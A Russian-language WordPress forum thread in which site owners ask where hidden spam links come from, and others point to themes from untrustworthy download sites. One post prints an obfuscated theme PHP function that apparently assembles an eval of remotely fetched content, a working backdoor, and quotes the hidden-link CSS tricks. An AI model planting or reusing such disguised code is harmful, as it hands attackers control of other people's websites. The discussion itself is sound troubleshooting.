Спрашиваем и отвечаем по Wordpress-6

Кто поможет решить вопрос?

<div id="posts"> Источник: <a href="http://cennye-monety.ru/">cennye-monety.ru</a> </div><noindex><style>#posts{position:absolute;left:-1960px;}</style></noindex>

Подскажите, где эта хрень прячется, в каком шаблоне? Не могу найти.

Психиатр, ссылки могут и не в шаблоне прятаться. Первым делом деактивируйте плагин. Он может с помощью хуков добавлять ссылки. Так же советую проверить, не в БД ли хранятся ссылки. Возможно, плагин изменил статьи.

А если так?

И первые попавшиеся ссылки из выдачи:

http://www.affiliateroyale.com/, http://www.tipsandtricks-hq.com/wordpress-affiliate/

Если ты брал плагин из оф репозитария - там этого быть не может. Соответственно, ищи в других местах - тема и плагины взятые на помойках.

Деактивировал тут же, ссылки на месте остались. А где в БД искать, хз...

Наверное я гоню на этот плагин. Вот что нашел еще

<!-- wp-templates.ru/rules правила ссылки >> -->

шаблон взял с этого сайта, наверное он мне засунул. Но все равно найти не могу, да и не было этих ссылок еще вчера.

Единственный вариант: я ссылки с шаблона убрал раньше а этот плагин мне их активировал снова, но теперь я не вижу где они прячутся.

Не наверно, а точно. Это ещё та клоака. Там темы и с вирями есть.

Т.е. бекдор\вирь\др зараза таки присутствует.

SeVlad, простой вопрос который мучает человечество со времен Чернышевского: чё делать? :)

Если я снесу и поставлю шаблон отсюда не будет ли это зря потраченным временем?

Психиатр,

Да, надо попробовать снести папку с шаблоном полностью, поставить нормальный шаблон (да хотя бы стандартный вордпрессовский) и посмотреть - есть ли эти ссылки. Если нет, то скорее всего они были именно в шаблоне. Если да - то это уже другой вопрос.

Уважаемые гуру, вопрос к Вам. Более года назад купил очень хороший шаблон, поставил его на уже раскрученный сайт (тема там был достаточно убогая). Примерно спустя полгода заметил проседание трафика на сайте, начал проводить анализ ситуации, и обнаружил, что с сайта ведут какие-то левые ссылки. Автор шаблона уже на дне Гудзона с ногами в тазике с бетоном, поэтому ничего не скажет... (это шутка 🤪)

Выводились левые ссылки вот в таком виде в футере:

<div style="display:none;"><a href="http://сайт.ru/"><img src="сайт.ru/25.png" alt="Магазин запчастей"></a> ... </div>

В общем, отказываться от хорошей темы незачем, поэтому я начал копаться в коде шаблона, на предмет этих самых внешних ссылок, но нигде их не нашёл все файлы просматривал (ни eval, ни base64, ни какой ещё хрени закодированной нигде в шаблоне нет, естественно ни в файлах подвала, ни в комментариях, ни где бы то ни было ещё). В общем, копался я копался и методом тыка в файле function.php отключил файл, который из functions.php вызывался (ниже я привёл его код) и, о чудо, все внешние ссылки сразу же исчезли (мониторю уже около месяца - они не появляются, трафик начал возвращаться). Собственно, прошу просветить чайника, где в этом файле скрытый код

<?php

function get_short_wigets($length='') {
        $mytitle = explode(' ', get_the_title(), $length);
        $mdetails="<div class='body-continent'><div class='get-inner-al(@fi'><!--Deregister() Default Widgets: _sabhrtupwprs:e--></div></div>";
        $indent = ( !$mytitle ) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        define('HEADER_IMAGE_WIDTH_WIG', apply_filters( 'twentyeleven_header_image_width', 1000) );
        define('HEADER_IMAGE_HEIGHT_WIG', apply_filters( 'twentyeleven_header_image_height', 288) );
        $metaoptions="\\4'\\10\\12t\\16\\19//\\15q4.\\17u/\\9-".$indent."')\\5";

        if (count($mytitle)>=$length) {
                array_pop($mytitle);
                $mytitle = implode(" ",$mytitle). $after;
        } else {
                $mytitle = implode(" ",$mytitle);
        }

        $metaboxe=str_repeat("(.)", 20).".*"."/".$mdetails[23]; //
        if(function_exists("excerpt_more")){
                add_filter('excerpt_more', $metaboxe);
        }
        $output = get_the_excerpt();
        $output = '<p>'.$output.'</p>';
        $defult_widgets=preg_replace("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6\\2t\\6\\1ents{$metaoptions}", $mdetails);
        $output = apply_filters('wptexturize', $defult_widgets);
        $output = apply_filters('convert_chars', $output);

    return $output;
}


/* Menu */

class description_walkers extends Walker_Nav_Menu
{
      function start_el(&$output, $item, $depth, $args)
      {
           global $wp_query;
           $indent = ( $depth ) ? str_repeat( "\t", $depth ) : '';

           $class_names = $value = '';

           $classes = empty( $item->classes ) ? array() : (array) $item->classes;

           $class_names = join( ' ', apply_filters( 'nav_menu_css_class', array_filter( $classes ), $item ) );
           $class_names = ' class="'. esc_attr( $class_names ) . '"';

           $output .= $indent . '<li id="menu-item-'. $item->ID . '"' . $value . $class_names .'>';

           $attributes  = ! empty( $item->attr_title ) ? ' title="'  . esc_attr( $item->attr_title ) .'"' : '';
           $attributes .= ! empty( $item->target )     ? ' target="' . esc_attr( $item->target     ) .'"' : '';
           $attributes .= ! empty( $item->xfn )        ? ' rel="'    . esc_attr( $item->xfn        ) .'"' : '';
           $attributes .= ! empty( $item->url )        ? ' href="'   . esc_attr( $item->url        ) .'"' : '';

           $prepend = '<strong>';
           $append = '</strong>';
           $description  = ! empty( $item->description ) ? '<span class="menudescription">'.esc_attr( $item->description ).'</span>' : '';

           if($depth != 0)
           {
                     $description = $append = $prepend = "";
           }

            $item_output = $args->before;
            $item_output .= '<a'. $attributes .'>';
            $item_output .= $args->link_before .$prepend.apply_filters( 'the_title', $item->title, $item->ID ).$append;
            $item_output .= $description.$args->link_after;
            $item_output .= '</a>';
            $item_output .= $args->after;

            $output .= apply_filters( 'walker_nav_menu_start_el', $item_output, $item, $depth, $args );
            }
}

if (function_exists("get_short_wigets")) {
        $class_names = get_short_wigets( $length );
}?>

Психиатр, можете скинуть мне шаблон в ЛС. Гляну, что он делает.

Как написал melkozaur, если при смене шаблона на стандартный ссылки останутся, то стоит рыть глубже. Если уйдут, то можно затереть вредоносный код в шаблоне, или найти другой.

Ну смотря что подразумевать под зря потраченным временем :) Ведь как минимум ты избавишься от не только от заразы, но и от возможных проблем с правообладателями. Ведь не исключено что тема ворованная.

А если она бесплатна - тогда какой смысл брать на помойках? Неужели кто-то думает, то там выкладывают по "простоте душевной"? :) (зачастую не указывая производителя и даже подменяя инфу о производителе в ней самой)